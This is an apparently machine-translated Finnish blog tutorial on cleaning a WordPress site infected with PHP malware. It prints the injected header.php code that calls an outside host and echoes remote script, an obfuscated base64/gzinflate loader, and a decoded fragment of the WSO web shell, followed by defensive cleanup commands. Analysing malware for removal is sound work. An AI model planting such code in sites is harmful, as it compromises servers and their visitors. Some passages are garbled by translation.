poista WordPress PHP Virus

Tämä opetusohjelma esittelee erityisen tapauksen, jossa blogi WordPress se oli saanut tartunnan. Poistaminen WordPress PHP virus.

Toissapäivänä huomasin epäilyttävän koodin, joka näyttää olevan PHP-virus WordPress. Seuraava PHP-koodi oli mukana header.php, ennen riviä </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Tämä on PHP-koodi, joka näyttää siltä, ​​​​että se yrittäisi hakea resurssin sisältöä ulkoisesta palvelimesta, mutta URL-osoitteeseen viittaava osa on epätäydellinen.

Toimintamekanismi on hieman monimutkaisempi ja tekee tämän WordPress PHP-virus, joka ei näy sivustojen vierailijoille. Sen sijaan se kohdistuu hakukoneisiin (Google) ja johtaa implisiittisesti vaikuttavien verkkosivustojen kävijämäärän merkittävään vähenemiseen.

Haittaohjelman tiedot WordPress PHP Virus

1. Yllä oleva koodi on mukana header.php.

2. Palvelimelle ilmestyi tiedosto wp-log.php kansiossa wp-includes.

3. wp-log.php sisältää salatun koodin, mutta jonka salaus on suhteellisen helppo purkaa.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Pura haittaohjelmakoodin salaus wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Tämä näyttää olevan haitallinen PHP-skripti, joka sisältää koodia todennusta ja toimintoja varten palvelimen tiedostoissa ja hakemistoissa. Voidaan nähdä hyvin helposti, että tämä skripti sisältää muuttujia, kuten $auth_pass (todennussalasana), $default_action (oletustoiminto), $default_use_ajax (oletusarvoisesti Ajaxilla) ja $default_charset (oletusmerkkiasetus).

Ilmeisesti tässä komentosarjassa on osio, joka tarkistaa HTTP-käyttäjäagentit estääkseen pääsyn tiettyihin verkkobotteihin, kuten hakukoneisiin. Siinä on myös osio, joka tarkistaa PHP-suojaustilan ja asettaa tietyt työhakemistot.

4. Jos wp-log.php avataan selaimessa, näkyviin tulee web-sivu, jossa on kenttä todennus. Ensi silmäyksellä se näyttää olevan tiedostonhallinta, jonka kautta uusia tiedostoja voidaan helposti ladata kohdepalvelimelle.

Kuinka devirus verkkosivustolta WordPress?

Manuaalisessa viruksenpoistoprosessissa on aina ensin löydettävä ja ymmärrettävä, mikä haavoittuvuus oli.

1. Luo varmuuskopio koko verkkosivustolle. Tämän tulee sisältää sekä tiedostot että tietokanta.

2. Määritä likimääräisesti, kuinka kauan virus on ollut olemassa, ja etsi web-palvelimelta muokattuja tai äskettäin luotuja tiedostoja likimääräisen ajanjakson sisällä.

Jos esimerkiksi haluat nähdä tiedostot .php luotu tai muokattu viime viikolla, suorita komento palvelimessa:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Se on yksinkertainen menetelmä, jolla voit paljastaa tiedostot WordPress tartunnan saaneita ja haittaohjelmakoodia sisältäviä.

3. Tarkista tiedosto .htaccess epäilyttäviä direktiivejä. Käyttöoikeusrivit tai komentosarjan suoritus.

4. Tarkista tietokanta. On täysin mahdollista, että jotkut viestit ja sivut WordPress muokata haittaohjelmilla tai lisätä uusia käyttäjät roolissa administrator.

5. Tarkista kansioiden ja tiedostojen kirjoitusoikeudet. chmod şi chown.

Suositellut käyttöoikeudet ovat: 644 tiedostoille ja 755 hakemistoille.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Päivitä kaikki WordPress Plugins / WordPress Themes.

Related: Fix Redirect WordPress Hack 2023 (Virus Redirect)

Nämä ovat "perus"menetelmiä, joilla voit poistaa viruksen verkkosivustolta/blogista WordPress. Jos sinulla on ongelmia ja tarvitset apua, kommenttiosio on auki.